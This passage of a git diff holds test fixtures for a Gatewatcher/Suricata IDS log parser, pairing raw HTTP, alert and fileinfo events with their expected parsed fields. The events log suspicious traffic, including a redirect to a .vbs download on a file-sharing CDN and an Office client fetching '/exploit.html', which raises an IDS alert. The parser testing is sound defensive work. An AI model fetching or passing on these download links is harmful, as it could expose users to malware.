GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "module": "http"
+    },
+    "@timestamp": "2023-03-22T10:44:07.997000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "ip": "2.2.2.2",
+      "port": 16122
+    },
+    "gatewatcher": {
+      "event_type": "http",
+      "flow_id": "1408237495862400",
+      "gcap": "gcap-xxxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxxxx.domain.local",
+      "timestamp_analyzed": "2023-03-22T10:44:07.997Z",
+      "timestamp_detected": "2023-03-22T10:25:55.377Z",
+      "type": "suricata"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "status_code": 302
+      }
+    },
+    "network": {
+      "transport": "TCP"
+    },
+    "observer": {
+      "hostname": "gcap-xxxxxxxxx.domain.local",
+      "mac": [
+        "90:e2:ba:a6:a4:90",
+        "90:e2:ba:a6:a4:91"
+      ],
+      "name": "gcap-xxxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "hosts": [
+        "dc524.4shared.com",
+        "gcap-xxxxxxxxx.domain.local"
+      ],
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 8550
+    },
+    "url": {
+      "domain": "dc524.4shared.com",
+      "path": "/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000",
+      "registered_domain": "4shared.com",
+      "subdomain": "dc524",
+      "top_level_domain": "com"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "IE",
+      "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+      "os": {
+        "name": "Windows",
+        "version": "7"
+      },
+      "version": "11.0"
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/suricata_alert_event.json b/GateWatcher/aioniq/tests/suricata_alert_event.json
deleted file mode 100644
index 4e84873a0..000000000
--- a/GateWatcher/aioniq/tests/suricata_alert_event.json
+++ /dev/null
@@ -1,101 +0,0 @@
-{
-  "input": {
-    "message": "{\"@timestamp\":\"2022-06-03T14:59:41.373Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"alert\",\"payload\":\"SFRUUC8xLjEgMjAwIE9LCkRhdGU6IFRodSwgMDIgSnVuIDIwMjIgMjI6Mzc6MjIgR01UClNlcnZlcjogQXBhY2hlLzIuNC40MSAoVWJ1bnR1KQpMYXN0LU1vZGlmaWVkOiBUaHUsIDAyIEp1biAyMDIyIDIyOjMwOjM0IEdNVApFVGFnOiAiMTdkOS01ZTA3ZThkZGI0NTA4LWd6aXAiCkFjY2VwdC1SYW5nZXM6IGJ5dGVzClZhcnk6IEFjY2VwdC1FbmNvZGluZwpDb250ZW50LUVuY29kaW5nOiBnemlwCkNvbnRlbnQtTGVuZ3RoOiAyNDg1CktlZXAtQWxpdmU6IHRpbWVvdXQ9NSwgbWF4PTEwMApDb25uZWN0aW9uOiBLZWVwLUFsaXZlCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sCgp0ZXN0Cg==\",\"packet\":\"CAAnjitsCAAnk+hwCABFAAAoBRhAAD8GMWkKAQHewKg4yABQwow7Z24SQI3k4FAQAfUWzAAA\",\"type\":\"suricata\",\"community_id\":\"1:dGVzdAo=\",\"app_proto\":\"http\",\"src_ip\":\"9.8.7.6\",\"dest_port\":49804,\"alert\":{\"action\":\"allowed\",\"rev\":2,\"signature\":\"ETPRO INFO Observed Suspicious Base64 Encoded Wide String Inbound (exe)\",\"category\":\"Potentially Bad Traffic\",\"gid\":1,\"metadata\":{\"updated_at\":[\"2020_11_17\"],\"created_at\":[\"2020_04_13\"],\"former_category\":[\"HUNTING\"],\"signature_severity\":[\"Informational\"],\"attack_target\":[\"Client_Endpoint\"],\"deployment\":[\"Perimeter\"],\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"]},\"signature_id\":2841990,\"severity\":2},\"flow\":{\"pkts_toserver\":5,\"bytes_toserver\":798,\"start\":\"2022-06-03T14:59:08.750205+0000\",\"pkts_toclient\":4,\"bytes_toclient\":3052},\"files\":[{\"filename\":\"/exploit.html\",\"state\":\"CLOSED\",\"tx_id\":0,\"sid\":[1100029],\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"size\":6105,\"stored\":false}],\"proto\":\"TCP\",\"stream\":1,\"host\":\"network.internal\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"ether\":{\"src_mac\":\"08:00:27:8e:2b:6c\",\"dest_mac\":\"08:00:27:93:e8:70\"},\"src_port\":80,\"flow_id\":1686930575880829,\"payload_printable\":\"HTTP/1.1 200 OK\\r\\nDate: Thu, 02 Jun 2022 22:37:22 GMT\\r\\nServer: Apache/2.4.41 (Ubuntu)\\r\\nLast-Modified: Thu, 02 Jun 2022 22:30:34 GMT\\r\\nETag: \\\"17d9-5e07e8ddb4508-gzip\\\"\\r\\nAccept-Ranges: bytes\\r\\nVary: Accept-Encoding\\r\\nContent-Encoding: gzip\\r\\nContent-Length: 2485\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/html\\r\\n\\r\\n...........Xko........\\n.F&.$VS..]pmYRa.Vd9q.(.........gW......#7....G....s.=.RO.....q..&n.....0.k...|{D.....!6.....V&nB.6.oVap......}7........l..>..{>{..~k.n..f.5]o.....X..k._G....U.....|...\\\\.a.m.f......._.!...c.8.Z..n.0........i..`.:..c[.a..;......_.........gv}.L.1V.G.......o.2,}..C~..w.(,...[..at+..8.~..'.mh1a..y......hVc0.n.iB.en.Z..O.]...l.b..2.b..{|i|._+...o].3}..Wd....3\\\"...!:.............C./.Z.....\\rP$S,.t<Y..m.E.]5Y-...Sx.A..1...[W.@.......kKlb...m.3..n./......c...\\n..@y0.....5.........$ .#..|\\r.......;.w}....`.)..u....U^.....lD...D.#...&...jaT.........@@..Lf..6l.z........p>.s.k..!..r..UI..g...ji^V...,.k..0i...}.!.=.......2.%.@..=u........{'Y@.k.8!.*`... ..c..z.j.u.D.....*......G.ng.U.....@.3U......\\n...$/..!.c.....T..S..tr.$...h......$(....&R...i.U#PL.J{...\\n!E.-9,w.....$%Xh9.U!...6...S`b...C>.i.cW......H...It\\n...B......q.IR....\\n..P&....i.d... .07.]U$tD.R...J4............^....tIT....UaD....g..k.b.......\\rm.VcK....p:....P.Dj...\\nD*0u*..b..(..P...\\\\S..Q*VT'......m.............7B..D./\\\"...gX..\\\".9W....I.=.9......T.%.U....J{b.l.\\r..Q.X.t9U.i)......R.i..V.g.5c..^.,.....&=r..p0SX..E...S5hsSJt..J...'}#8.........R.H.D.(i.TW...^.&..>@v..+sX\\ra..],>I.!%.`l`..,vDvL.....vDwM....,.I.-[3IP.I..GMi.I.MYa..'Z$U]r...... j3CE).NM!.@.!a......T.S.77....k&...P.........8...$..:.A.....+A........a......Mm..*..\\\\..zZ\\\"\\n...D.I.e.....r..9..JD..8.u`vd{..=.)Y.9...\\\\A'.}J...'.A?....)...........U....M5.`....J.&..e.D....N{1.s...d....cZE....\\nG)..8.nq)..G..`..@.T.rgB..B.9>7.@.\\\\&#'EUT...;Xt?...P.%W'.,@(\\r.+Y...4.y~.{d.&xn\\\"...../].....k.m.ZK`..M.lr.....VK.\\\"z&.R+.V.<-..U.\\\"...IU.h%/9....y....T)].f..._.I.X0K.k...|-t...\\\\.d#7.A..J..I.L.H7:.r..%].Ti......(....V-i....2...:...`J...\\\"S\\\"..?I.......w..E....Q.......B.l$.T.E....-......k.u........BQ.#.Tn@.C..x.7.K/...M...},..-L.......~..E.@..o.7.. .!.t....._q.....\\\\........H...Y...MA...`U.8..O..z.J.l#91..\\\".+...Vi..v..k......%.k...0i..u.T.O#A.[j.M...*G*W..s.......V..+.%.......t:..&<....Uz..2.....{....\\\\.{a.H.-.D.QC..]|>3..t5.........9.._n.U..1Ly.....(v.Fm...agn..zs.s=0..........;..U..\\n.........bs...[={.A....oG...7.../.}...yz.>......7......B;.....m\\r.../....F!../O./.n...~~..u$.~....hz..e..n.@(.=.Ui.../.\\\\_-F{..........W....~...g}......W........uWvm..ve1~n...vo_<.....=.......}e.v..gOl.^D{vJ..k_........>......y|.........k.=..W.?}.s.../^......=.4.#=.~..l?.}.}k._.....K>...k....._...:...N........`}C......w.................:.wW...Z.....~.....}.._..%?.W8.....$.R..y...............sCq.....y.....)^e....gS^<z..G...|.G....\\n)p,.|...v7.............LMY._.o.......y.......\",\"packet_info\":{\"linktype\":1},\"in_iface\":\"monvirt\",\"dest_ip\":\"1.2.3.4\",\"timestamp_analyzed\":\"2022-06-03T14:59:41.373Z\",\"gcap\":\"gcap-sekoia.gatewatcher.com\",\"tx_id\":0,\"uuid\":\"525084c9-9a40-4dc9-81fb-27d5efe6b965\",\"severity\":2}"
-  },
-  "expected": {
-    "message": "{\"@timestamp\":\"2022-06-03T14:59:41.373Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"alert\",\"payload\":\"SFRUUC8xLjEgMjAwIE9LCkRhdGU6IFRodSwgMDIgSnVuIDIwMjIgMjI6Mzc6MjIgR01UClNlcnZlcjogQXBhY2hlLzIuNC40MSAoVWJ1bnR1KQpMYXN0LU1vZGlmaWVkOiBUaHUsIDAyIEp1biAyMDIyIDIyOjMwOjM0IEdNVApFVGFnOiAiMTdkOS01ZTA3ZThkZGI0NTA4LWd6aXAiCkFjY2VwdC1SYW5nZXM6IGJ5dGVzClZhcnk6IEFjY2VwdC1FbmNvZGluZwpDb250ZW50LUVuY29kaW5nOiBnemlwCkNvbnRlbnQtTGVuZ3RoOiAyNDg1CktlZXAtQWxpdmU6IHRpbWVvdXQ9NSwgbWF4PTEwMApDb25uZWN0aW9uOiBLZWVwLUFsaXZlCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sCgp0ZXN0Cg==\",\"packet\":\"CAAnjitsCAAnk+hwCABFAAAoBRhAAD8GMWkKAQHewKg4yABQwow7Z24SQI3k4FAQAfUWzAAA\",\"type\":\"suricata\",\"community_id\":\"1:dGVzdAo=\",\"app_proto\":\"http\",\"src_ip\":\"9.8.7.6\",\"dest_port\":49804,\"alert\":{\"action\":\"allowed\",\"rev\":2,\"signature\":\"ETPRO INFO Observed Suspicious Base64 Encoded Wide String Inbound (exe)\",\"category\":\"Potentially Bad Traffic\",\"gid\":1,\"metadata\":{\"updated_at\":[\"2020_11_17\"],\"created_at\":[\"2020_04_13\"],\"former_category\":[\"HUNTING\"],\"signature_severity\":[\"Informational\"],\"attack_target\":[\"Client_Endpoint\"],\"deployment\":[\"Perimeter\"],\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"]},\"signature_id\":2841990,\"severity\":2},\"flow\":{\"pkts_toserver\":5,\"bytes_toserver\":798,\"start\":\"2022-06-03T14:59:08.750205+0000\",\"pkts_toclient\":4,\"bytes_toclient\":3052},\"files\":[{\"filename\":\"/exploit.html\",\"state\":\"CLOSED\",\"tx_id\":0,\"sid\":[1100029],\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"size\":6105,\"stored\":false}],\"proto\":\"TCP\",\"stream\":1,\"host\":\"network.internal\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"ether\":{\"src_mac\":\"08:00:27:8e:2b:6c\",\"dest_mac\":\"08:00:27:93:e8:70\"},\"src_port\":80,\"flow_id\":1686930575880829,\"payload_printable\":\"HTTP/1.1 200 OK\\r\\nDate: Thu, 02 Jun 2022 22:37:22 GMT\\r\\nServer: Apache/2.4.41 (Ubuntu)\\r\\nLast-Modified: Thu, 02 Jun 2022 22:30:34 GMT\\r\\nETag: \\\"17d9-5e07e8ddb4508-gzip\\\"\\r\\nAccept-Ranges: bytes\\r\\nVary: Accept-Encoding\\r\\nContent-Encoding: gzip\\r\\nContent-Length: 2485\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/html\\r\\n\\r\\n...........Xko........\\n.F&.$VS..]pmYRa.Vd9q.(.........gW......#7....G....s.=.RO.....q..&n.....0.k...|{D.....!6.....V&nB.6.oVap......}7........l..>..{>{..~k.n..f.5]o.....X..k._G....U.....|...\\\\.a.m.f......._.!...c.8.Z..n.0........i..`.:..c[.a..;......_.........gv}.L.1V.G.......o.2,}..C~..w.(,...[..at+..8.~..'.mh1a..y......hVc0.n.iB.en.Z..O.]...l.b..2.b..{|i|._+...o].3}..Wd....3\\\"...!:.............C./.Z.....\\rP$S,.t<Y..m.E.]5Y-...Sx.A..1...[W.@.......kKlb...m.3..n./......c...\\n..@y0.....5.........$ .#..|\\r.......;.w}....`.)..u....U^.....lD...D.#...&...jaT.........@@..Lf..6l.z........p>.s.k..!..r..UI..g...ji^V...,.k..0i...}.!.=.......2.%.@..=u........{'Y@.k.8!.*`... ..c..z.j.u.D.....*......G.ng.U.....@.3U......\\n...$/..!.c.....T..S..tr.$...h......$(....&R...i.U#PL.J{...\\n!E.-9,w.....$%Xh9.U!...6...S`b...C>.i.cW......H...It\\n...B......q.IR....\\n..P&....i.d... .07.]U$tD.R...J4............^....tIT....UaD....g..k.b.......\\rm.VcK....p:....P.Dj...\\nD*0u*..b..(..P...\\\\S..Q*VT'......m.............7B..D./\\\"...gX..\\\".9W....I.=.9......T.%.U....J{b.l.\\r..Q.X.t9U.i)......R.i..V.g.5c..^.,.....&=r..p0SX..E...S5hsSJt..J...'}#8.........R.H.D.(i.TW...^.&..>@v..+sX\\ra..],>I.!%.`l`..,vDvL.....vDwM....,.I.-[3IP.I..GMi.I.MYa..'Z$U]r...... j3CE).NM!.@.!a......T.S.77....k&...P.........8...$..:.A.....+A........a......Mm..*..\\\\..zZ\\\"\\n...D.I.e.....r..9..JD..8.u`vd{..=.)Y.9...\\\\A'.}J...'.A?....)...........U....M5.`....J.&..e.D....N{1.s...d....cZE....\\nG)..8.nq)..G..`..@.T.rgB..B.9>7.@.\\\\&#'EUT...;Xt?...P.%W'.,@(\\r.+Y...4.y~.{d.&xn\\\"...../].....k.m.ZK`..M.lr.....VK.\\\"z&.R+.V.<-..U.\\\"...IU.h%/9....y....T)].f..._.I.X0K.k...|-t...\\\\.d#7.A..J..I.L.H7:.r..%].Ti......(....V-i....2...:...`J...\\\"S\\\"..?I.......w..E....Q.......B.l$.T.E....-......k.u........BQ.#.Tn@.C..x.7.K/...M...},..-L.......~..E.@..o.7.. .!.t....._q.....\\\\........H...Y...MA...`U.8..O..z.J.l#91..\\\".+...Vi..v..k......%.k...0i..u.T.O#A.[j.M...*G*W..s.......V..+.%.......t:..&<....Uz..2.....{....\\\\.{a.H.-.D.QC..]|>3..t5.........9.._n.U..1Ly.....(v.Fm...agn..zs.s=0..........;..U..\\n.........bs...[={.A....oG...7.../.}...yz.>......7......B;.....m\\r.../....F!../O./.n...~~..u$.~....hz..e..n.@(.=.Ui.../.\\\\_-F{..........W....~...g}......W........uWvm..ve1~n...vo_<.....=.......}e.v..gOl.^D{vJ..k_........>......y|.........k.=..W.?}.s.../^......=.4.#=.~..l?.}.}k._.....K>...k....._...:...N........`}C......w.................:.wW...Z.....~.....}.._..%?.W8.....$.R..y...............sCq.....y.....)^e....gS^<z..G...|.G....\\n)p,.|...v7.............LMY._.o.......y.......\",\"packet_info\":{\"linktype\":1},\"in_iface\":\"monvirt\",\"dest_ip\":\"1.2.3.4\",\"timestamp_analyzed\":\"2022-06-03T14:59:41.373Z\",\"gcap\":\"gcap-sekoia.gatewatcher.com\",\"tx_id\":0,\"uuid\":\"525084c9-9a40-4dc9-81fb-27d5efe6b965\",\"severity\":2}",
-    "event": {
-      "action": "allowed",
-      "category": [
-        "network"
-      ],
-      "kind": "alert",
-      "severity": 2,
-      "type": [
-        "info"
-      ]
-    },
-    "@timestamp": "2022-06-03T14:59:41.373000Z",
-    "destination": {
-      "address": "1.2.3.4",
-      "bytes": 3052,
-      "ip": "1.2.3.4",
-      "packets": 4,
-      "port": 49804
-    },
-    "gatewatcher": {
-      "event_type": "alert",
-      "flow_id": "1686930575880829",
-      "gcap": "gcap-sekoia.gatewatcher.com",
-      "gcenter": [
-        "gcenter-sekoia.gatewatcher.com",
-        "gcenter-sekoia.gatewatcher.com"
-      ],
-      "timestamp_analyzed": "2022-06-03T14:59:41.373Z",
-      "timestamp_detected": "2022-06-03T14:59:08.780Z",
-      "type": "suricata"
-    },
-    "http": {
-      "request": {
-        "method": "GET"
-      },
-      "response": {
-        "status_code": 200
-      }
-    },
-    "network": {
-      "protocol": "http",
-      "transport": "TCP"
-    },
-    "observer": {
-      "hostname": "network.internal",
-      "mac": [
-        "08:00:27:8e:2b:6c",
-        "08:00:27:93:e8:70"
-      ],
-      "name": "gcap-sekoia.gatewatcher.com",
-      "type": "firewall",
-      "version": "0.2"
-    },
-    "related": {
-      "hosts": [
-        "network.internal",
-        "www.xmlformats.com"
-      ],
-      "ip": [
-        "1.2.3.4",
-        "9.8.7.6"
-      ]
-    },
-    "rule": {
-      "category": "Potentially Bad Traffic",
-      "id": "2841990",
-      "name": "ETPRO INFO Observed Suspicious Base64 Encoded Wide String Inbound (exe)"
-    },
-    "source": {
-      "address": "9.8.7.6",
-      "bytes": 798,
-      "ip": "9.8.7.6",
-      "packets": 5,
-      "port": 80
-    },
-    "url": {
-      "domain": "www.xmlformats.com",
-      "path": "/exploit.html",
-      "registered_domain": "xmlformats.com",
-      "subdomain": "www",
-      "top_level_domain": "com"
-    },
-    "user_agent": {
-      "device": {
-        "name": "Other"
-      },
-      "name": "Outlook",
-      "original": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)",
-      "os": {
-        "name": "Other"
-      },
-      "version": "2016"
-    }
-  }
-}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/suricata_fileinfo_event.json b/GateWatcher/aioniq/tests/suricata_fileinfo_event.json
deleted file mode 100644
index 80dbaa73f..000000000
--- a/GateWatcher/aioniq/tests/suricata_fileinfo_event.json
+++ /dev/null
@@ -1,98 +0,0 @@
-{
-  "input": {
-    "message": "{\"@timestamp\":\"2022-06-03T14:59:41.374Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"fileinfo\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"host\":\"gcap-sekoia.gatewatcher.com\",\"type\":\"suricata\",\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"fileinfo\":{\"tx_id\":0,\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"file_id\":1,\"sid\":[1100029],\"state\":\"CLOSED\",\"size\":6105,\"stored\":true,\"filename\":\"/exploit.html\"},\"src_port\":80,\"flow_id\":1686930575880829,\"app_proto\":\"http\",\"in_iface\":\"monvirt\",\"src_ip\":\"9.8.7.6\",\"dest_port\":49804,\"dest_ip\":\"1.2.3.4\",\"timestamp_analyzed\":\"2022-06-03T14:59:41.374Z\",\"gcap\":\"gcap-sekoia.gatewatcher.com\",\"uuid\":\"a2d71147-3283-4136-9dc1-df9beaffd301\",\"proto\":\"TCP\"}"
-  },
-  "expected": {
-    "message": "{\"@timestamp\":\"2022-06-03T14:59:41.374Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"fileinfo\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"host\":\"gcap-sekoia.gatewatcher.com\",\"type\":\"suricata\",\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"fileinfo\":{\"tx_id\":0,\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"file_id\":1,\"sid\":[1100029],\"state\":\"CLOSED\",\"size\":6105,\"stored\":true,\"filename\":\"/exploit.html\"},\"src_port\":80,\"flow_id\":1686930575880829,\"app_proto\":\"http\",\"in_iface\":\"monvirt\",\"src_ip\":\"9.8.7.6\",\"dest_port\":49804,\"dest_ip\":\"1.2.3.4\",\"timestamp_analyzed\":\"2022-06-03T14:59:41.374Z\",\"gcap\":\"gcap-sekoia.gatewatcher.com\",\"uuid\":\"a2d71147-3283-4136-9dc1-df9beaffd301\",\"proto\":\"TCP\"}",
-    "event": {
-      "category": [
-        "network"
-      ],
-      "kind": "event",
-      "type": [
-        "info"
-      ]
-    },
-    "@timestamp": "2022-06-03T14:59:41.374000Z",
-    "destination": {
-      "address": "1.2.3.4",
-      "ip": "1.2.3.4",
-      "port": 49804
-    },
-    "file": {
-      "hash": {
-        "md5": "16e3fcee85f81ec9e9c75dd13fb08c01",
-        "sha256": "2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c"
-      },
-      "name": "/exploit.html",
-      "size": 6105
-    },
-    "gatewatcher": {
-      "event_type": "fileinfo",
-      "flow_id": "1686930575880829",
-      "gcap": "gcap-sekoia.gatewatcher.com",
-      "gcenter": [
-        "gcenter-sekoia.gatewatcher.com",
-        "gcenter-sekoia.gatewatcher.com"
-      ],
-      "timestamp_analyzed": "2022-06-03T14:59:41.374Z",
-      "timestamp_detected": "2022-06-03T14:59:08.780Z",
-      "type": "suricata"
-    },
-    "http": {
-      "request": {
-        "method": "GET"
-      },
-      "response": {
-        "status_code": 200
-      }
-    },
-    "network": {
-      "protocol": "http",
-      "transport": "TCP"
-    },
-    "observer": {
-      "hostname": "gcap-sekoia.gatewatcher.com",
-      "name": "gcap-sekoia.gatewatcher.com",
-      "type": "firewall",
-      "version": "0.2"
-    },
-    "related": {
-      "hash": [
-        "16e3fcee85f81ec9e9c75dd13fb08c01",
-        "2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c"
-      ],
-      "hosts": [
-        "gcap-sekoia.gatewatcher.com",
-        "www.xmlformats.com"
-      ],
-      "ip": [
-        "1.2.3.4",
-        "9.8.7.6"
-      ]
-    },
-    "source": {
-      "address": "9.8.7.6",
-      "ip": "9.8.7.6",
-      "port": 80
-    },
-    "url": {
-      "domain": "www.xmlformats.com",
-      "path": "/exploit.html",
-      "registered_domain": "xmlformats.com",
-      "subdomain": "www",
-      "top_level_domain": "com"
-    },
-    "user_agent": {
-      "device": {
-        "name": "Other"
-      },
-      "name": "Outlook",
-      "original": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)",
-      "os": {
-        "name": "Other"
-      },
-      "version": "2016"
-    }
-  }
-}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/suricata_http_event.json b/GateWatcher/aioniq/tests/suricata_http_event.json
deleted file mode 100644
index 93db17d00..000000000
--- a/GateWatcher/aioniq/tests/suricata_http_event.json
+++ /dev/null
@@ -1,88 +0,0 @@
-{
-  "input": {
-    "message": "{\"@timestamp\":\"2022-06-03T14:59:41.378Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"http\",\"type\":\"suricata\",\"community_id\":\"1:dGVzdAo=\",\"src_ip\":\"9.8.7.6\",\"dest_port\":80,\"proto\":\"TCP\",\"http\":{\"content_type\":\"text/html\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"connection\":\"Keep-Alive\",\"authorization\":\"Bearer\",\"length\":0,\"server\":\"Apache/2.4.41 (Ubuntu)\",\"url\":\"/exploit.html\",\"http_user_agent\":\"Microsoft Office Existence Discovery\",\"date\":\"Thu, 02 Jun 2022 22:37:22 GMT\",\"protocol\":\"HTTP/1.1\",\"http_parsed_user_agent\":{\"os_name\":\"Other\",\"os_full\":\"Other\",\"name\":\"Other\",\"device\":\"Other\",\"os\":\"Other\"},\"content_length\":\"6105\",\"last_modified\":\"Thu, 02 Jun 2022 22:30:34 GMT\",\"vary\":\"Accept-Encoding\",\"http_method\":\"HEAD\",\"status\":200},\"host\":\"gcap-sekoia.gatewatcher.com\",\"timestamp_detected\":\"2022-06-03T14:59:08.833Z\",\"ether\":{\"src_mac\":\"00:17:a4:77:09:20\",\"dest_mac\":\"a0:36:9f:0f:b1:70\"},\"src_port\":49804,\"flow_id\":1686930575880829,\"in_iface\":\"monvirt\",\"dest_ip\":\"1.2.3.4\",\"timestamp_analyzed\":\"2022-06-03T14:59:41.378Z\",\"metadata\":{\"flowbits\":[\"Office.UA\"]},\"gcap\":\"gcap-sekoia.gatewatcher.com\",\"tx_id\":4,\"uuid\":\"4f1bd378-9439-4c1c-ab1d-4b3ba6c22b87\"}"
-  },
-  "expected": {
-    "message": "{\"@timestamp\":\"2022-06-03T14:59:41.378Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"http\",\"type\":\"suricata\",\"community_id\":\"1:dGVzdAo=\",\"src_ip\":\"9.8.7.6\",\"dest_port\":80,\"proto\":\"TCP\",\"http\":{\"content_type\":\"text/html\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"connection\":\"Keep-Alive\",\"authorization\":\"Bearer\",\"length\":0,\"server\":\"Apache/2.4.41 (Ubuntu)\",\"url\":\"/exploit.html\",\"http_user_agent\":\"Microsoft Office Existence Discovery\",\"date\":\"Thu, 02 Jun 2022 22:37:22 GMT\",\"protocol\":\"HTTP/1.1\",\"http_parsed_user_agent\":{\"os_name\":\"Other\",\"os_full\":\"Other\",\"name\":\"Other\",\"device\":\"Other\",\"os\":\"Other\"},\"content_length\":\"6105\",\"last_modified\":\"Thu, 02 Jun 2022 22:30:34 